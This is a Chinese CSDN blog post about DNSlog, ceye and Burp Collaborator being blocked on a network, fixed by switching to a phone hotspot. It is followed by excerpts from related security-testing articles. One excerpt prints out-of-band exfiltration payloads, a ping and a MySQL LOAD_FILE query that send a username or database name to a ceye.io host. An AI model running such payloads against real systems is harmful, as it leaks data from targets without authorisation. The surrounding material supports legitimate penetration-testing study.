DNSlog，ceye，burp collaboration无法访问

Drun1baby

已于 2023-10-10 10:06:07 修改

阅读量2.5k

点赞数 4

分类专栏：踩坑文章标签：网络安全 windows 网络协议

于 2022-03-08 10:24:14 首次发布

本文链接：https://blog.youkuaiyun.com/Withdraw_end/article/details/123347118

版权

踩坑专栏收录该内容

11 篇文章

订阅专栏

本文讲述了如何通过手机热点解决网络设备墙问题，使得DNSlog、ceye和burpcollaboration等工具得以正常访问。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

DNSlog，ceye，burp collaboration一直无法访问

其实就是被当前网络下的设备墙了，用手机开热点就解决了。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Drun1baby

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

《WEB安全渗透测试》（28）Burp Collaborator-dnslog外带技术

午夜安全

08-01

2898

1）打开BurpSuite，第一步选择“Projectoptions”，第二步选择“Misc”，第三步选择“UsethedefaultCollaboratorserver”（使用默认配置的外带服务器，如果想使用自己的服务器，可以在下面自由配置），第四步点击“Runhealthcheck..”测试外带服务器是否可以正常工作。这两个平台，他们是免费的DNSlog平台，我们利用它们可以监控DNS解析记录和HTTP访问记录，这对我们验证一些漏洞非常有帮助。...

使用BurpSuite测试访问控制

大河之犬的博客

01-22

213

Burp Proxy 允许您配置匹配和替换规则，这些规则在您使用 Burp 的浏览器正常浏览目标应用程序时自动修改您的请求和响应。3、复制wiener的session到gregg的用户请求，出现302跳转，代表不存在水平提权漏洞。测试水平访问控制同权限提升的方法一致，不同的是水平访问控制对应的是两个权限相等的账户。如果没有适当的访问控制，攻击者就可以操纵这些引用，并在未经授权的情况下访问其他对象。将低权限用户的 Cookie 粘贴到管理面板请求中，替换Cookie。查找低权限用户的最新请求。

参与评论您还未登录，请先登录后发表或查看评论

ceye-dnslog

weixin_55885866的博客

01-14

718

检查是否为 http://detectportal.firefox.com/success.txt。print(f"发生错误: {err}")# 创建一个新的参数字典，用于更改参数。开始后测试每个参数后查看ceye平台看看是否出现问题。# 返回，不继续处理此请求。# 检查请求是否成功。# 更改当前参数的值。# 打印更改后的参数。# 在这里添加处理响应的逻辑。# 启动mitmproxy代理服务器。

总结：burp无法代理，连接不上网络问题的7个原因

weixin_43652669的博客

03-09

2万+

首要条件：.der的证书已经安装（安卓端为.cer）检查其他条件：本地代理设置了“不使用代理地址“：127.0.0.1&localhost；本地代理尝试使用IP地址：XXX.XXX.XXX.XXX，而不是127.0.0.1&localhost；代理tomcat可能存在端口冲突，检查端口是否存在冲突；新版火狐需要设置允许本地代理：ａ. 浏览器输入：about:confi...

解决 Burpsuite Error Proxy Failed to connect to xxx.com

最新发布

2302_80514516的博客

04-15

259

最近当我对谷歌抓包的时候出现了问题，在这里跟大家分享一下我的解决办法。关于为何代理工具在相同的位置，为什么一个是上游代理，一个是下游代理，实际上跟两个工具抓包原理不同和功能逻辑有关，在此不在详细赘述，大家能明白上述流量是怎么走的就行。有疑问可以直接评论区发问，看到了的话我会回答的，觉得用处的话还请点个免费赞和关注，我后续会发一下自己的挖洞思路和如何高效的信息收集。此时不出意外，应该就可以抓到外网的数据包了。

利用dnslog和ceye.io盲打

weixin_48776804的博客

07-21

2245

利用dnslog和ceye.io

DNS与DNSLog

qq_45675619的博客

05-11

2420

这里写目录标题DNS简介解析过程DNSLog简介ceye的使用DNSLog注入SQL盲注 DNS 简介 DNS（Domain Name System）,也就是域名系统。将域名与IP地址相互映射的一个分布式数据库。DNS使用UDP端口53。域名解析的过程就是将域名去DNS服务器的数据库中寻找，这是比较耗费时间的。为了提高上网速度，运营商一般在他们的DNS服务器中缓存了许多的DNS记录，再根据用户所在地进行网络分配。这样用户打开网页则不需要去查询DNS数据库，而是直接使用缓存的DNS记录。解析过程大致流程

DNSlog使用

shangMD01的博客

12-04

1018

打开dnslog平台：点击Get SunDomain获取域名并复制：复制完打开新网页并粘贴在url上访问，在DNSlog网页内刷新，就会出现一条DNS记录：

DNSLog漏洞探测(二)之常用DNSLog平台

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

12-10

6289

我们在上一篇文章中我们介绍了什么是DNSLog，如果我们自己要去搭建一个DNSLog的服务平台，还是比较复杂和麻烦的，所以我们可以直接去使用一些公开免费的DNSLog平台，DNSLog的平台非常的多，但是实际上大部分的DNSLog的平台都是昙花一现，真正意义上稳定持久的就只有那么几个，那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。

Burpsuite-UAScan:burpsuite插件：被动进行未授权访问扫描

05-23

Burpsuite插件：被动方式进行未授权访问漏洞（越权）的扫描被动扫描经过Burpsuite的每一个请求通过修改Cookie头重新访问判断是否存在未授权访问（越权）问题如果扫描到未授权访问的URL会显示到空白区域中采用...

BurpSuite下载

11-27

Burp Suite 是一款功能强大的集成化网络应用程序安全测试工具，它广泛应用于安全行业的渗透测试工作中。该工具集成了多种用于网络应用攻击的功能，主要包括：扫描器、监听器、Intruder、Repeater、Decoder、Comparer...

【burpSuite】浏览器设置代理后无法访问https

热门推荐

AlimSah的博客

03-13

3万+

开启burpSuite，浏览器设置代理之后，如果访问使用https的网站时，会被卡住，告诉你“您的访问不安全”之类的。简单地说，这是证书与证书信任的问题，解决方法是下载burpSuite官方(也就是portSwigger)的证书，并信任它。官方指导：https://support.portswigger.net/customer/portal/articles/1783075-installing

渗透实录-02

qq_32660043的博客

12-22

424

一次渗透实录。

利用DNSLOG获取看不到的信息（给盲注带上眼镜）

wodafa的博客

04-27

3246

毕业设计总算搞得差不多了，这个心累啊。这不，完成了学校的任务，赶紧回来给蛋总交作业。今天给大家分享一个姿势吧，不是什么新东西，但比较少见——用DNS log来获取回显。

DNSLog使用笔记

糖小喵

09-27

5584

首先DNSlog网址：http://www.dnslog.cn/ 一般用作回显，这里会记录请求，也就是记录DNS访问记录的东西，同样在局域网可用http服务。

burpsuite collaborato模块简介 dns log、http_https log、smtp_smtps log

whatday的专栏

08-11

7666

Burp suite Pro自从v1.6.15版本开始引入了一种名为Burp Collaborator的模块，该模块的作用简单的说就是集合了DNS log, http_https log和smtp_smtps log的记录器，有点类似国内的Ceye平台。为了解释这个模块，burp引入了In-band attack与 out-band attack（带内与带外攻击）两个概念，两者最主要的区别在于数据的流动方向和参与者的数量。带内攻击(In-band attack)是平时最常见的渗透测试模型：通

安全测试的辅助工具之DNSLog 平台

西京刀客

03-27

518

DNSLog 是一种用于安全测试的辅助工具，主要用于检测无回显漏洞（如 SSRF、Blind SQLi、XXE 等）。它的核心原理是通过 DNS 协议记录目标服务器发起的 DNS 查询请求，从而间接验证漏洞的存在。

dnslog注入

qq_40039615的博客

06-11

230

首先 ceye是一个网站不是一个应用程序 http://ceye.io 这个是他的网址操作： ping %USERNAME%.b182oj.ceye.io curl sk7s6n.ceye.io 核心语法：Loadfile 函数只能在windows操作系统执行，所以目标一定要是windows操作系统 SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.sk7s6n.ceye.io\\test')); 官方.

shiro漏洞工具简单配置

m0_67393039的博客

08-30

585

我们知道shiro框架最明显的特征就是返回的cookie中有rememberMe这个字样，拓展一下，如果返回的cookie有xxxrememberMe字样是不是也有可能是shiro框架，而shiro检测工具只默认检测含有rememberMe在返回包的数量来确定漏洞，打开config/config.properties文件，修改rememberMeCookieName=rememberMe为实际遇到的cookie内容，例如rememberMeCookieName=xcbgv-rememberMe等。...

burpsuite如何访问https

01-28

### 如何配置 Burp Suite 访问 HTTPS 站点为了使 Burp Suite 能够拦截和修改 HTTPS 请求，需要安装 Burp 的 CA 证书到操作系统或浏览器中。这允许 Burp Suite 执行中间人攻击来解密流量。 #### 安装 Burp Suite 的 CA 证书 1. 启动 Burp Suite 并确保代理正在运行。 2. 导航至 `Proxy` -> `Options` 标签页，在这里可以找到用于导出 Burp Suite CA 证书的链接[^3]。 3. 单击该链接下载 CA 证书文件（通常是一个 `.cer` 或者 `.der` 文件），保存此文件以便后续导入操作系统的信任存储或直接在浏览器内安装。 4. 对于不同类型的客户端设备，按照各自的操作指南将这个证书添加为受信根认证机构：对于 Windows 和 macOS 用户来说，可以通过控制面板中的 Internet 设置或者 Keychain Access 来实现；而对于 Linux 发行版，则取决于具体发行版本而定。针对主流浏览器如 Chrome, Firefox 等也需要单独处理其内置的安全机制: - **Chrome**: 自动继承系统级别的证书管理器设置； - **Firefox**: 需要手动进入选项->隐私与安全->查看证书->导入已准备好的CA证书[^4]。 #### 修改目标应用程序的信任链当访问 HTTPS 网站时，可能会遇到 SSL/TLS 错误提示页面，这是因为浏览器检测到了不被认可的证书颁发者。此时应该确认确实是要连接的目标站点，并同意继续浏览以完成初次握手过程。之后所有的交互都将通过加密通道传输给服务器端。 ```bash # 如果使用命令行工具 curl 测试 https 页面响应情况 curl -k https://example.com ```